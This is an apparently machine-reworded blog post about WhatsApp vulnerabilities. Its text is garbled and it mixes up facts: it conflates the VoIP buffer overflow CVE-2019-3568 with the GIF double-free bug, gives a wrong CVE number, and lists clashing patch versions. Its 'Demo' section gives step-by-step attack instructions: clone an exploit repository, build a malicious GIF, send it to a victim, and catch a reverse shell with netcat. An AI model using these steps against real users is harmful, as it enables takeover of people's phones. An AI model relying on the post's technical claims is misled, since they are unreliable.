WhatsApp Vulnerability
WhatsApp's new vulnerability has attracted the attention of media and security experts around the world. Zimperium ZLabs will be building a detailed blog soon, but now we want to give our readers the first details.
Below is a quick summary of the risks. There are rumors that the risk was used by the NSO group, but no evidence has been provided to support this to the media. As it stands, this post will only include risk analysis and how Zimperium can help.
In the background
On May 13, Facebook announced the vulnerability that accompanies all of its WhatsApp products. This risk was reported in the wild, and was designated as CVE-2017-3568.
WhatsApp told the BBC that its securitay team was the first to point out the error. You share that information with human rights groups, select security vendors and the U.S. Department of Justice. Earlier this month.
Weaknesses of CVE-2019-3568
WhatsApp has a risk of overload, which means the attacker can use it to use malicious code on the device. Data packets can be used during phone startup, causing overload and attacker to order the application. Attackers can then send monitoring tools to the device to be used against the target.
Definition: The vulnerability of buffer overload in the VoIP VoIP (Voice over Internet Protocol) stack, allows remote coding in a series specifically designed for SRTP (Secure Real-Time Transport Protocol) packets sent to the specified phone number.
#Affected species:
WhatsApp for Android before V2.19.134
WhatsApp Business for Android before V2.19.44
WhatsApp for iOS before V2.19.51
WhatsApp Business for iOS before V2.19.51
V. WhatsApp Windows Phone before v2.18.348
WhatsApp for Tizen before V2.18.15.
#Solutions
Apply for a repair by the seller:
WhatsApp for Android 2.19.274 and latest versions
WhatsApp for iOS 2.19.100 and latest versions
WhatsApp Enterprise Client 2.25.3 and latest versions
WhatsApp versions of Windows Phone after 2.18.368
WhatsApp Business for Android 2.19.104 with the latest versions
WhatsApp Business for iOS 2.19.100 and latest versions
#How does this Vulnerability work?
WhatsApp uses the library of questions in question to create previews of GIF files while using their device's gallery before sending a media file to friends or family. Significantly, sending a bad GIF file does not pose a risk. Procurement; Instead it is done when the victim himself opens the WhatsApp gallery lock while trying to easily send a media file. To take advantage of this problem, all attackers need to send a malicious GIF file designed for an Android user who registers with any Internet connection. Channel and wait for the photo gallery to open in the Channel app. However, if attackers want to send a GIF file to victims via any messaging platform such as WhatsApp or Messenger, it needs to be sent as a document file instead of media attachments, as the image distorts the malicious loading of hidden images used by these services. As shown in the video presentation, the risk can be reversed remotely from a hacked device.
#Demo:
Step 1. git clone https://github.com/AshuJaiswal109/CVE-2019-11932
Step2: make && ./exploit exploit1.gif
Step3: now copy output result and paste in txt file & save the filewith extension .gif then send the exploit1.gif file to victim.
now use net cat for the shell of the victim
nc -lvp 5555
When victim open their gallery using whatsapp then you will get the shell.
#WhatsApp GIF Attack Vectors
WhatsApp GIF Hack can be done in two ways. The app collects the addresses of the zygote libraries and creates a detailed GIF file that leads to coding on WhatsApp. This message allows you to steal warewareware files from WhatsApp sandbox including database.
Remote Code Use: By pairing a Remote Memory Discovery with a vulnerable system, an attacker can collect Zygotelibridge addresses and create a nasty GIF file to send. User via WhatsApp (not like Gallery Picker image, WhatsApp is trying to convert media files to MP4 and will make your malicious GIF worthless
0 Comments